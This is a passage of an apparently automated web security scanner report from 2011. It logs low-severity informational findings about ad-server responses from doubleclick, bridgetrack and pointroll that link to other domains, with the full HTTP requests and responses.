document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/c/58/%2a/r;228460384;1-0;0;50162132;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp://a1.interclick.com/icaid/128531/tid/88285d39-c26a-4993-96e1-8a5d87de37e5/click.ic?http%3a%2f%2fwww.transunion.com/%3Fam%3D2060%26channel%3Dpaid%26cid%3Ddisplay%3A2060"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.8. http://ad.doubleclick.net/adj/invc.macroaxis/widget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/invc.macroaxis/widget

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adj/invc.macroaxis/widget;kw=;kval=widget;tile=11;sz=88x31;ord=4611983066424727? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp?gia=t&t=26&s=NYA,IXIC,GSPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 09 May 2011 15:37:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/n;237457143;2-0;0;60882667;21-88/31;41550533/41568320/1;;~aopt=0/ff/22/ff;~fdr=237529654;0-0;0;45421274;21-88/3
...[SNIP]...
95435/41013222/1;;~aopt=3/1/22/0;~sscs=%3fhttp://www.optionshouse.com/landing/rates_compare/?utm_source=invchannel&utm_medium=paid-banner-ads&utm_campaign=88x31-PartnrCtrBttn&utm_content=stock:ohfeat"><img src="http://s0.2mdn.net/viewad/3017628/88x31_ohfeatures_040411_395.gif" border=0 alt="Advertisement"></a>
...[SNIP]...

17.9. http://ads.bridgetrack.com/a/f/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /a/f/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8560941387472259&output=html&h=250&slotname=8504762554&w=300&lmt=1304973456&flash=10.2.154&url=http%3A%2F%2Fwww.therepublic.com%2Fhome%2F&dt=1304955456815&bpp=48&shv=r20110427&jsv=r20110427&correlator=1304955456958&frm=0&adk=3853240141&ga_vid=434740447.1304955454&ga_sid=1304955454&ga_hid=157227490&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&ref=http%3A%2F%2Fwww.therepublic.com%2Flogin%2Fprocess%2F&fu=0&ifi=2&dtd=163&xpc=iqVH5Fr9Rv&p=http%3A//www.therepublic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sun, 08 May 2011 15:37:41 GMT
Vary: Accept-Encoding
P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads.bridgetrack.com/w3c/p3p.xml"
Set-Cookie: ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=9996D17BE9434FAF86AAA6900B6D6F82&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=588064&Cr=71712&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=15920d163AJLc68c268c1FJ7Nc38c1CFc2610cHU90cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=89BD0AAD619444D2AFEC01012356111B; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close
Content-Length: 4022

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...
<NOSCRIPT><A HREF="http://googleads.g.doubleclick.net/aclk?sa=l&ai=BjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA&num=1&sig=AGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ&client=ca-pub-8560941387472259&adurl=http%3A%2F%2Fads%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D316722%26BT%5FSID%3D98461%26" target="_blank"><IMG WIDTH=300 HEIGHT=250 SRC="http://ads.bridgetrack.com.edgesuite.net/assets/71708/$250_BOLDGREEN_300x250_LCD_LP.jpg" ALT="" BORDER=0></A><img src="http://ad.doubleclick.net/ad/N5762.150143.GOOGLE.COM/B5023054.65;sz=1x1;pc=[TPAS_ID];ord=153807263?" border=0 width=1 height=1 /></NOSCRIPT>
...[SNIP]...

17.10. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1278427N54020110421174444&flash=10&time=13049554201|10:37|-5&redir=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf%26redirectURL=$CTURL$&pos=x&dom=http://optimized-by.rubiconproject.com&r=0.9951261263340712 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-8E99-8AB9-0309-8D40011C0203; PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:37:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 1999
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eotmc42r-AEECAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmZjrmKAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-E39C-FF6A-0309-A36001040200; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:2|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:11|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:2|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:2|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FW9n:1|FKqE:2|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:2|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:2|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FW9nGLZC:1|FKqEGKwo:2|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&redirectURL=http://clk.pointroll.com/bc/?a=1473804&c=1&i=D9A20400-E39C-FF6A-0309-A36001040200&clickurl=http://www.playtexbramakeover.com/'><img border=0 width='728' height='90' style='width:728px;height:90px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Hanes/863118/PTX_728x90_BF.jpg?PRAd=1473804&PRCID=1473804&PRplcmt=1278427&P
...[SNIP]...

17.11. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB&num=1&sig=AGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g&client=ca-pub-6743622525202572&adurl=http://clk.pointroll.com/bc/?a=1472054&c=1&i=D9A20400-9495-C8E0-0309-8D40011C0203&clickurl=http://ad.doubleclick.net/click%3Bh=v2%7C3DC0%7C0%7C0%7C%252a%7Cd%3B239992381%3B0-0%3B0%3B60927427%3B31-1%7C1%3B41081340%7C41099127%7C1%3B%3B%253fhttp://www.ford.com/commercial-trucks/%3Fbannerid=691050%7C60927427%7C239992381%7C0%26referrer=N3106.GoogleContentNetwork'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg?PRAd=1472054&PR
...[SNIP]...

17.12. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:36|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBIxur6wnITYvYL8G6lQfEiM2BDqTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEGmALADLgCGMgC5In4GeACAOoCEDMwMHgyNTBDX0dlbmVyYWyQA6QDmAPgA6gDAegDa-gDkwXoA5gD6AOLCegDjAn1AwIEAET1AyAAAADgBAE%26num%3D1%26sig%3DAGiWqtwblKQkvKvYR7-meTWiSF-YSMCUiw%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.9906379778403789 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVnCn7AEcCDe; PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6; PRimp=D9A20400-9C95-FB29-0309-8D40011C0203; PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; 